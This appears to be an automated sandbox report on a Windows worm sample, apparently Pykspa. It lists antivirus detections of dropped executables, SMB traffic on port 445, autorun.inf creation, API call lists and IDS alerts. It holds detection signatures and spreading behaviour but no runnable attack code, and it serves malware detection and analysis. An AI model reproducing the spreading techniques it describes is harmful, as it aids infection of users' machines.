2024-10-15T15:40:47.294589+020028033063Unknown Traffic192.168.11.3049932104.27.207.9280TCP
2024-10-15T15:40:50.649816+020028033063Unknown Traffic192.168.11.3049937104.19.223.7980TCP
2024-10-15T15:40:53.821856+020028033063Unknown Traffic192.168.11.3049941104.19.223.7980TCP
2024-10-15T15:40:57.267600+020028033063Unknown Traffic192.168.11.3049945172.67.155.17580TCP
2024-10-15T15:41:03.892130+020028033063Unknown Traffic192.168.11.3049954104.19.223.7980TCP
2024-10-15T15:41:07.467550+020028033063Unknown Traffic192.168.11.3049959104.19.223.7980TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T15:40:13.895775+020028115421A Network Trojan was detected1.1.1.153192.168.11.3061373UDP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: HqvlYZC7Gf.exeAvira: detected
Source: C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exeAvira: detection malicious, Label: TR/Drop.Agent.bjxj
Source: C:\Users\user\AppData\Local\Temp\srfewatkjeewrqrigftsko.exeAvira: detection malicious, Label: TR/Drop.Agent.bjxj
Source: C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\RCX70EC.tmpAvira: detection malicious, Label: TR/Drop.Agent.bjxj
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeAvira: detection malicious, Label: TR/Drop.Agent.bjxj
Source: C:\Users\user\AppData\Local\Temp\srfewatkjeewrqrigftsko.exeAvira: detection malicious, Label: TR/Drop.Agent.bjxj
Source: C:\Users\user\AppData\Local\Temp\ojtoccrezqmarmjwql.exeAvira: detection malicious, Label: TR/Drop.Agent.bjxj
Source: C:\ylnagyfkxg.batAvira: detection malicious, Label: TR/Drop.Agent.bjxj
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeAvira: detection malicious, Label: TR/Agent.327680.A
Source: C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exeAvira: detection malicious, Label: TR/Drop.Agent.bjxj
Source: C:\Users\user\AppData\Local\Temp\zvgcrsiwskhwokiwrny.exeAvira: detection malicious, Label: TR/Drop.Agent.bjxj
Source: C:\qfjygajqfqgo.batAvira: detection malicious, Label: TR/Drop.Agent.bjxj
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeAvira: detection malicious, Label: TR/Drop.Agent.bjxj
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeAvira: detection malicious, Label: TR/Drop.Agent.bjxj
Source: C:\qhneokveviakxo.batAvira: detection malicious, Label: TR/Drop.Agent.bjxj
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeAvira: detection malicious, Label: TR/Drop.Agent.bjxj
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeAvira: detection malicious, Label: TR/Drop.Agent.bjxj
Source: C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\ylnagyfkxg.exeAvira: detection malicious, Label: TR/Drop.Agent.bjxj
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeAvira: detection malicious, Label: TR/Drop.Agent.bjxj
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeAvira: detection malicious, Label: TR/Agent.327680.A
Source: C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exeAvira: detection malicious, Label: TR/Drop.Agent.bjxj
Source: C:\Users\user\AppData\Local\Temp\srfewatkjeewrqrigftsko.exeAvira: detection malicious, Label: TR/Drop.Agent.bjxj
Source: C:\Users\user\AppData\Local\Temp\zvgcrsiwskhwokiwrny.exeAvira: detection malicious, Label: TR/Drop.Agent.bjxj
Source: C:\Users\user\AppData\Local\Temp\ojtoccrezqmarmjwql.exeAvira: detection malicious, Label: TR/Drop.Agent.bjxj
Source: C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exeAvira: detection malicious, Label: TR/Drop.Agent.bjxj
Source: C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exeAvira: detection malicious, Label: TR/Drop.Agent.bjxj
Source: C:\Users\user\AppData\Local\Temp\zvgcrsiwskhwokiwrny.exeAvira: detection malicious, Label: TR/Drop.Agent.bjxj
Source: C:\Users\user\AppData\Local\Temp\ojtoccrezqmarmjwql.exeAvira: detection malicious, Label: TR/Drop.Agent.bjxj
Source: C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exeAvira: detection malicious, Label: TR/Drop.Agent.bjxj
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeReversingLabs: Detection: 97%
Source: C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exeReversingLabs: Detection: 97%
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeReversingLabs: Detection: 97%
Source: C:\Users\user\AppData\Local\Temp\ojtoccrezqmarmjwql.exeReversingLabs: Detection: 97%
Source: C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\ylnagyfkxg.exeReversingLabs: Detection: 97%
Source: C:\Users\user\AppData\Local\Temp\srfewatkjeewrqrigftsko.exeReversingLabs: Detection: 97%
Source: C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exeReversingLabs: Detection: 97%
Source: C:\Users\user\AppData\Local\Temp\zvgcrsiwskhwokiwrny.exeReversingLabs: Detection: 97%
Source: C:\Windows\SysWOW64\bzmkbewmkeduommczxkiz.exeReversingLabs: Detection: 97%
Source: C:\Windows\SysWOW64\fzicpocoiytgwqmyr.exeReversingLabs: Detection: 97%
Source: C:\Windows\SysWOW64\mjvsikbqngeunkjyurda.exeReversingLabs: Detection: 97%
Source: C:\Windows\SysWOW64\ojtoccrezqmarmjwql.exeReversingLabs: Detection: 97%
Source: C:\Windows\SysWOW64\srfewatkjeewrqrigftsko.exeReversingLabs: Detection: 97%
Source: C:\Windows\SysWOW64\yrzsecpaticodwrc.exeReversingLabs: Detection: 97%
Source: C:\Windows\SysWOW64\zvgcrsiwskhwokiwrny.exeReversingLabs: Detection: 97%
Source: C:\Windows\bzmkbewmkeduommczxkiz.exeReversingLabs: Detection: 97%
Source: C:\Windows\fzicpocoiytgwqmyr.exeReversingLabs: Detection: 97%
Source: C:\Windows\mjvsikbqngeunkjyurda.exeReversingLabs: Detection: 97%
Source: C:\Windows\ojtoccrezqmarmjwql.exeReversingLabs: Detection: 97%
Source: C:\Windows\srfewatkjeewrqrigftsko.exeReversingLabs: Detection: 97%
Source: C:\Windows\yrzsecpaticodwrc.exeReversingLabs: Detection: 97%
Source: C:\Windows\zvgcrsiwskhwokiwrny.exeReversingLabs: Detection: 97%
Source: HqvlYZC7Gf.exeReversingLabs: Detection: 97%
Source: C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\srfewatkjeewrqrigftsko.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\RCX70EC.tmpJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\srfewatkjeewrqrigftsko.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ojtoccrezqmarmjwql.exeJoe Sandbox ML: detected
Source: C:\ylnagyfkxg.batJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\zvgcrsiwskhwokiwrny.exeJoe Sandbox ML: detected
Source: C:\qfjygajqfqgo.batJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeJoe Sandbox ML: detected
Source: C:\qhneokveviakxo.batJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\ylnagyfkxg.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\srfewatkjeewrqrigftsko.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\zvgcrsiwskhwokiwrny.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ojtoccrezqmarmjwql.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\zvgcrsiwskhwokiwrny.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ojtoccrezqmarmjwql.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exeJoe Sandbox ML: detected
Source: HqvlYZC7Gf.exeJoe Sandbox ML: detected

Exploits

barindex
Source: global trafficTCP traffic: 192.168.11.8:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.7:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.9:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.16:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.2:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.1:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.4:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.13:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.3:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.12:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.6:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.15:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.5:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.14:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.11:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.10:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.8:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.7:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.9:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.16:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.2:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.1:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.4:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.13:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.3:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.12:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.6:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.15:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.5:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.14:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.11:445Jump to behavior
Source: global trafficTCP traffic: 192.168.11.10:445Jump to behavior
Source: HqvlYZC7Gf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Spreading

barindex
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer NoDriveTypeAutoRunJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeFile created: C:\autorun.infJump to behavior
Source: zjisvko.exe, 00000004.00000002.208997558580.000000000416A000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: C:\autorun.inf
Source: zjisvko.exe, 00000004.00000002.208997558580.000000000416A000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: [AutoRun]
Source: zjisvko.exe, 00000004.00000002.208997558580.000000000416A000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ylnagyfkxg.batyrzsecpaticodwrcunvoaylwpeykzsnyqjrkwuhslaugvojumfngsqdohwqcrkfqibjcomzkdsmyngbmexfykivgzoiujcxiatbugercvkeqfytewpxqcanybjgop.exeC:\autorun.inf,
Source: autorun.inf.4.drBinary or memory string: [AutoRun]
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00407850 lstrcatA,Sleep,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,2_2_00407850
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00401000 Sleep,wsprintfA,FindFirstFileA,lstrcpyA,lstrcatA,wsprintfA,lstrcpyA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,lstrcatA,CopyFileA,FindNextFileA,FindClose,2_2_00401000
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00414883 lstrcatA,lstrcpyA,Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrcatA,wsprintfA,lstrlenA,lstrcmpiA,lstrcpyA,lstrcatA,lstrcatA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,2_2_00414883
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00408912 Sleep,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,lstrlenA,lstrlenA,lstrlenA,lstrcmpiA,lstrlenA,wsprintfA,GetUserNameA,wsprintfA,ShellExecuteA,wsprintfA,ShellExecuteA,Sleep,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,LoadLibraryA,EnumResourceNamesA,FreeLibrary,MoveFileA,SetFileAttributesA,FindNextFileA,FindClose,2_2_00408912
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00407259 Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrlenA,wsprintfA,lstrlenA,lstrcmpiA,lstrcpyA,lstrlenA,wsprintfA,FindNextFileA,FindClose,2_2_00407259
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_004092D5 Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrcpyA,lstrcatA,wsprintfA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,lstrcpyA,2_2_004092D5
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_004074A2 Sleep,Sleep,wsprintfA,FindFirstFileA,lstrlenA,wsprintfA,lstrlenA,lstrlenA,lstrcmpiA,lstrlenA,wsprintfA,lstrlenA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_004074A2
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00407D1E Sleep,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,FindNextFileA,FindClose,2_2_00407D1E
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00410F49 Sleep,wsprintfA,wsprintfA,FindFirstFileA,FindClose,wsprintfA,FindClose,FindNextFileA,FindClose,2_2_00410F49
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00406718 GetTickCount,Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrcatA,wsprintfA,lstrcpyA,lstrcatA,lstrcatA,SetFileAttributesA,FindNextFileA,FindClose,2_2_00406718
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_00407850 lstrlenA,Sleep,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,4_2_00407850
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_00414883 lstrcatA,lstrcpyA,Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrcatA,wsprintfA,lstrlenA,lstrcmpiA,lstrcpyA,lstrcatA,lstrcatA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,4_2_00414883
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_004092D5 Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrcpyA,lstrcatA,wsprintfA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,lstrcpyA,4_2_004092D5
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_00406718 lstrcmpiA,Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrcatA,wsprintfA,lstrcpyA,lstrcatA,lstrcatA,SetFileAttributesA,FindNextFileA,FindClose,4_2_00406718
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_00401000 lstrcatA,lstrcpyA,Sleep,wsprintfA,FindFirstFileA,lstrcpyA,lstrcatA,wsprintfA,lstrcpyA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,lstrcatA,CopyFileA,FindNextFileA,FindClose,4_2_00401000
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_00408912 Sleep,Sleep,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,lstrlenA,lstrlenA,lstrlenA,lstrcmpiA,lstrlenA,wsprintfA,GetUserNameA,wsprintfA,ShellExecuteA,wsprintfA,ShellExecuteA,Sleep,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,LoadLibraryA,EnumResourceNamesA,FreeLibrary,MoveFileA,SetFileAttributesA,FindNextFileA,FindClose,4_2_00408912
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_00407259 Sleep,Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrlenA,wsprintfA,lstrlenA,lstrcmpiA,lstrcpyA,lstrlenA,wsprintfA,FindNextFileA,FindClose,4_2_00407259
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_004074A2 Sleep,Sleep,wsprintfA,FindFirstFileA,lstrlenA,wsprintfA,lstrlenA,lstrlenA,lstrcmpiA,lstrlenA,wsprintfA,lstrlenA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,4_2_004074A2
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_00407D1E lstrcatA,Sleep,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,FindNextFileA,FindClose,4_2_00407D1E
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_00410F49 Sleep,wsprintfA,wsprintfA,FindFirstFileA,FindClose,wsprintfA,FindClose,FindNextFileA,FindClose,4_2_00410F49
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_00406718 GetTickCount,Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrcatA,wsprintfA,lstrcpyA,lstrcatA,lstrcatA,SetFileAttributesA,FindNextFileA,FindClose,5_2_00406718
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_00407850 lstrcatA,Sleep,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,5_2_00407850
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_00401000 Sleep,wsprintfA,FindFirstFileA,lstrcpyA,lstrcatA,wsprintfA,lstrcpyA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,lstrcatA,CopyFileA,FindNextFileA,FindClose,5_2_00401000
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_00414883 lstrcatA,lstrcpyA,Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrcatA,wsprintfA,lstrlenA,lstrcmpiA,lstrcpyA,lstrcatA,lstrcatA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,5_2_00414883
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_00408912 Sleep,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,lstrlenA,lstrlenA,lstrlenA,lstrcmpiA,lstrlenA,wsprintfA,GetUserNameA,wsprintfA,ShellExecuteA,wsprintfA,ShellExecuteA,Sleep,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,LoadLibraryA,EnumResourceNamesA,FreeLibrary,MoveFileA,SetFileAttributesA,FindNextFileA,FindClose,5_2_00408912
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_00407259 Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrlenA,wsprintfA,lstrlenA,lstrcmpiA,lstrcpyA,lstrlenA,wsprintfA,FindNextFileA,FindClose,5_2_00407259
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_004092D5 Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrcpyA,lstrcatA,wsprintfA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,lstrcpyA,5_2_004092D5
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_004074A2 Sleep,Sleep,wsprintfA,FindFirstFileA,lstrlenA,wsprintfA,lstrlenA,lstrlenA,lstrcmpiA,lstrlenA,wsprintfA,lstrlenA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,5_2_004074A2
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_00407D1E Sleep,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,FindNextFileA,FindClose,5_2_00407D1E
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_00410F49 Sleep,wsprintfA,wsprintfA,FindFirstFileA,FindClose,wsprintfA,FindClose,FindNextFileA,FindClose,5_2_00410F49
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_00407850 lstrcatA,Sleep,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,19_2_00407850
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_00401000 Sleep,wsprintfA,FindFirstFileA,lstrcpyA,lstrcatA,wsprintfA,lstrcpyA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,lstrcatA,CopyFileA,FindNextFileA,FindClose,19_2_00401000
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_00414883 lstrcatA,lstrcpyA,Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrcatA,wsprintfA,lstrlenA,lstrcmpiA,lstrcpyA,lstrcatA,lstrcatA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,19_2_00414883
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_00408912 Sleep,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,lstrlenA,lstrlenA,lstrlenA,lstrcmpiA,lstrlenA,wsprintfA,GetUserNameA,wsprintfA,wsprintfA,Sleep,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,LoadLibraryA,EnumResourceNamesA,FreeLibrary,MoveFileA,SetFileAttributesA,FindNextFileA,FindClose,19_2_00408912
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_00407259 Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrlenA,wsprintfA,lstrlenA,lstrcmpiA,lstrcpyA,lstrlenA,wsprintfA,FindNextFileA,FindClose,19_2_00407259
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_004092D5 Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrcpyA,lstrcatA,wsprintfA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,lstrcpyA,19_2_004092D5
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_004074A2 Sleep,Sleep,wsprintfA,FindFirstFileA,lstrlenA,wsprintfA,lstrlenA,lstrlenA,lstrcmpiA,lstrlenA,wsprintfA,lstrlenA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,19_2_004074A2
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_00407D1E Sleep,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,FindNextFileA,FindClose,19_2_00407D1E
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_00410F49 Sleep,wsprintfA,wsprintfA,FindFirstFileA,FindClose,wsprintfA,FindClose,FindNextFileA,FindClose,19_2_00410F49
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_00406718 GetTickCount,Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrcatA,wsprintfA,lstrcpyA,lstrcatA,lstrcatA,SetFileAttributesA,FindNextFileA,FindClose,19_2_00406718
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_004069AA GetLogicalDriveStringsA,Sleep,lstrcpyA,lstrlenA,2_2_004069AA
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior

Networking

barindex
Source: Network trafficSuricata IDS: 2018773 - Severity 1 - ET MALWARE Win32/Pykspa.C Public IP Check : 192.168.11.30:49833 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2018773 - Severity 1 - ET MALWARE Win32/Pykspa.C Public IP Check : 192.168.11.30:49799 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2018773 - Severity 1 - ET MALWARE Win32/Pykspa.C Public IP Check : 192.168.11.30:49804 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2018773 - Severity 1 - ET MALWARE Win32/Pykspa.C Public IP Check : 192.168.11.30:49820 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2018773 - Severity 1 - ET MALWARE Win32/Pykspa.C Public IP Check : 192.168.11.30:49803 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2018773 - Severity 1 - ET MALWARE Win32/Pykspa.C Public IP Check : 192.168.11.30:49800 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2018773 - Severity 1 - ET MALWARE Win32/Pykspa.C Public IP Check : 192.168.11.30:49814 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2018773 - Severity 1 - ET MALWARE Win32/Pykspa.C Public IP Check : 192.168.11.30:49805 -> 104.27.206.92:80
Source: Network trafficSuricata IDS: 2018773 - Severity 1 - ET MALWARE Win32/Pykspa.C Public IP Check : 192.168.11.30:49813 -> 104.27.206.92:80
Source: Network trafficSuricata IDS: 2018773 - Severity 1 - ET MALWARE Win32/Pykspa.C Public IP Check : 192.168.11.30:49810 -> 104.27.206.92:80
Source: Network trafficSuricata IDS: 2018773 - Severity 1 - ET MALWARE Win32/Pykspa.C Public IP Check : 192.168.11.30:49831 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2018773 - Severity 1 - ET MALWARE Win32/Pykspa.C Public IP Check : 192.168.11.30:49827 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2018773 - Severity 1 - ET MALWARE Win32/Pykspa.C Public IP Check : 192.168.11.30:49859 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2018773 - Severity 1 - ET MALWARE Win32/Pykspa.C Public IP Check : 192.168.11.30:49822 -> 104.27.206.92:80
Source: Network trafficSuricata IDS: 2018773 - Severity 1 - ET MALWARE Win32/Pykspa.C Public IP Check : 192.168.11.30:49834 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2018773 - Severity 1 - ET MALWARE Win32/Pykspa.C Public IP Check : 192.168.11.30:49838 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2018773 - Severity 1 - ET MALWARE Win32/Pykspa.C Public IP Check : 192.168.11.30:49844 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2018773 - Severity 1 - ET MALWARE Win32/Pykspa.C Public IP Check : 192.168.11.30:49842 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2018773 - Severity 1 - ET MALWARE Win32/Pykspa.C Public IP Check : 192.168.11.30:49850 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2018773 - Severity 1 - ET MALWARE Win32/Pykspa.C Public IP Check : 192.168.11.30:49871 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2018773 - Severity 1 - ET MALWARE Win32/Pykspa.C Public IP Check : 192.168.11.30:49856 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2018773 - Severity 1 - ET MALWARE Win32/Pykspa.C Public IP Check : 192.168.11.30:49843 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2018773 - Severity 1 - ET MALWARE Win32/Pykspa.C Public IP Check : 192.168.11.30:49851 -> 104.19.223.79:80
